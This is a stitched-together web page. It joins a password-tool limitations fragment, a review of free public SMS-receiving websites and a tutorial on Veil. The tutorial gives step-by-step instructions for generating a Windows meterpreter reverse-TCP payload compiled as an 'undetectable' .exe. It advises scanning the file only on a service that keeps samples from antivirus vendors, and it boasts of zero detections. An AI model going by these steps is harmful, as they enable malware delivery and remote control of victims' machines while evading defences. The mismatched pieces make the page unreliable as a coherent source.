Known Limitations

• It does not work with non-windows based applications such as GTK, Flash, Adobe Air or applications not using standard edit box for the password.
• Also it will not work with the application where password is not actually present. Some times applications do not put password in the password box to hide from these tools.
• It does not work with HTML pages in the browsers such as IE, Firefox, etc. Support for the same is planned for the future releases.

If you’ve visited the third site (ReceiveSMSOnline.net) on this list, you’ll find that the design looks very similar except for the difference in color and that is because they are both created by the same company “Cicklow”.

2 weeks ago three US phones numbers are listed and none of them worked at that time. They have been replaced with 2 new phone numbers and are currently working.

Offers a total of 8 phone numbers with 3 from the UK and 5 from the US. Two weeks ago there were 7 numbers and an additional US number has been added to the list. After testing, 2 US phone numbers (+19282388889 and +19282388892) failed to receive the SMS test message that we sent.

Weirdly, the 2 numbers that failed to display the test SMS message sent by us showed that the last messages received were 12 and 21 minutes ago. So if you see a phone number that has recently received a message, it does not necessarily mean that it is fully working at the moment.

ReceiveFreeSMS.com offers 10 public phone numbers from 8 different countries (US, Norway, Sweden, Australia, UK, Hungary, Spain and Lithuania). Although this site seems to be a winner, we did find that they are quite unreliable because 2 weeks ago only 3 out of 10 phone numbers received the test SMS that we sent and today it seems that they’ve fixed some of their numbers with 7 out of 10 working (1 Spain and 2 US did not work).

Only 1 US number was changed compared to the numbers listed on the website two weeks ago. ReceiveFreeSMS.com is the only site that displays the sender’s full phone number while the others hide the last 4 numbers.

Receive-SMS.com lists a total of 6 phone numbers, currently 3 from Great Britain and the other 3 from Sweden (previously was 4 Great Britain and 2 Sweden). Any messages sent to the public phone numbers will be instantly displayed on their website after a browser refresh unless you subscribe to their private phone numbers where you get a private inbox to view the messages.

Receive-SMS.com gets the top spot because all 6 public phone numbers are able to receive and display the test text messages that we sent.

How to bypass an Antivirus using Kali Linux Tool VELI

Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShivand The Grayhound @the_grayhound specifically designed for Kali Linux which has the goal of:

• Bypass common AV solutions used.
• Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
• Try to create each payload as random as possible.

Some days ago Veil v2.0.4 was Released. I’m want to talk about it and give some examples about how to bypass severals anti-virus.

The main changes in this version is:

• x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
• Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

If you want to install Veil in your own environment you can use the commands below:

If you want to work with Kali Linux, with the commands below it will be enough.

1. apt-get update

2. apt-get install veil

I had a bad experience with the second option and I prefer to install Veil with the first one using “setup.sh” script.

The veil’s developers don’t want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternative: vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: “Do not distribute the sample”.

When Veil is recently installed, just run it with the command below:
1.  ./Veil

By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type “use“.

Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing “18”



When our payload is loaded type “generate“. You can set some specifics options, but in this post, we are going to try the default options.



Now we are going to select msfvenom typing “1”



After that we need to type some details:
Enter metasploit payload: “windows/meterpreter/reverse_tcp“

Enter value for ‘LHOST’, [tab] for local IP: “168.69.69“
Enter value for ‘LPORT’: “443“

Then it’s necessary to wait while the shellcode is been generated.



You need to press enter and then Veil requests us the name of our payload. In this case “undetectable”



We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1”



In the end, we can get our executable at “/root/Veil-master/output/compiled/”



Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check “Do not distribute the sample”. If you choose to don’t check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.



You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!



If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.
